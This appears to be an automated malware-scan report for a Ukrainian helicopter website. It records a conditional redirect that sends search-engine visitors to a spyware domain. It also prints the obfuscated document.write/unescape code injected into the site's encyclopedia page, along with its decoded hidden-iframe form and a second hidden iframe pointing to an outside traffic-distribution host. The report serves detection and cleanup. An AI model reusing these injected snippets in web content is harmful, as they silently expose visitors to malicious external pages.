Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vertolet.kiev.ua/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vertolet.kiev.ua Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 01:49:10 GMT Location: http://www.spyware-systems.info/0/go.php?sid=2 Server: Apache/2.2.11 (Unix) PHP/5.2.3 with Suhosin-Patch Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://vertolet.kiev.ua/ | 200 OK Content-Length: 20083 Content-Type: text/html | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://t.proext.com/js/to.js | 200 OK Content-Length: 1863 Content-Type: application/javascript | clean |
http://vertolet.kiev.ua/content.php?id=32 | 200 OK Content-Length: 34216 Content-Type: text/html | clean |
http://vertolet.kiev.ua/index.php | 200 OK Content-Length: 20083 Content-Type: text/html | clean |
http://vertolet.kiev.ua/content.php?id=30 | 200 OK Content-Length: 18824 Content-Type: text/html | clean |
http://vertolet.kiev.ua/news.php | 200 OK Content-Length: 18630 Content-Type: text/html | clean |
http://vertolet.kiev.ua/menu.js | 404 Not Found Content-Length: 1060 Content-Type: text/html | clean |
http://vertolet.kiev.ua/test404page.js | 404 Not Found Content-Length: 1060 Content-Type: text/html | clean |
http://vertolet.kiev.ua/encyclopedia | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 01:49:13 GMT Location: http://vertolet.kiev.ua/encyclopedia/ Server: Apache/2.2.11 (Unix) PHP/5.2.3 with Suhosin-Patch Content-Length: 354 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vertolet.kiev.ua/encyclopedia/ | 200 OK Content-Length: 18423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%65%74%74%61%62%2E%66%72%65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%78%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%77%69%64%74%68%3D%22%35%22%20%68%65%69%67%68%74%3D%22%35%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%35%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A' ) ); Decoded script: <iframe src="http://pettab.freehostia.com/x/out.php?s_id=1" width="5" height="5" frameborder="5" style="display:none"></iframe> Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://abbcp.cn/tds_a/go.php/go.php?id=2 This URL is marked by Google as suspicious <iframe frameborder = 0 height = 2 width = 2 src = "http://abbcp.cn/tds_a/go.php/go.php?id=2" /> | ||
http://vertolet.kiev.ua/encyclopedia/menu.js | 200 OK Content-Length: 1065 Content-Type: application/x-javascript | clean |
http://vertolet.kiev.ua/../index.php | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../content.php?id=32 | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../content.php?id=30 | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../order.php | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vertolet.kiev.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vertolet.kiev.ua/
Result: vertolet.kiev.ua is not infected or malware details are not published yet.
Result: vertolet.kiev.ua is not infected or malware details are not published yet.